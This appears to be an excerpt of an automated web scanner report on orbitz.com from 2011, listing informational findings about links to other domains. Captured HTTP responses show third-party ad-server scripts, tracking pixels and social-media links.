http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=8CBB5C5D3F872AB64B59A20929B92C0D; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:25 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:25 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 156645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662785570&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.356. http://www.orbitz.com/App/PrepareVacationsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareVacationsHome

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PrepareVacationsHome?z=2eb7&r=a

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=package&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=120&rotator=module&width=519&adType=script&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=B95023C24A6297BB2A97C5E41C0E2856; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:24 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 112238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transiti
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x120">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=package&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=120&rotator=module&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=336x280&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=280&width=336&adType=noframe&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=package&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662784780&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...

17.357. http://www.orbitz.com/App/Sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Sitemap

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/Sitemap?z=2edb&r=1a

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://orbitzinsider.com/index.html
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzandgo.com/tlc/mobile.html?popupsDisabled=true
http://www.orbitzforagents.com/
http://www.orbitzforbusiness.com/
http://www.orbitzgames.com/
http://www.orbitzgames.com/index.aspx
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&
http://www.revresda.com/js.ng/channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&
http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=7490BFC587B03172C0CF1BEEF6F5E0B4; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:48 GMT
Content-Length: 34360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<br />
<a href="http://orbitzinsider.com/index.html">Orbitz Insider Podcasts</a>
...[SNIP]...
<br />
            <a class="eaEnabled" rel="nofollow" href="http://www.orbitzandgo.com/tlc/mobile.html?popupsDisabled=true" target="_blank" onClick="return popUpGen('http://www.orbitzandgo.com/tlc/mobile.html?popupsDisabled=true','795','706');" >Mobile access</a>
...[SNIP]...
<br />
           <a href="http://www.orbitzforbusiness.com/">Corporate travel</a>
...[SNIP]...
<h4><a href="http://www.orbitzgames.com/index.aspx" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
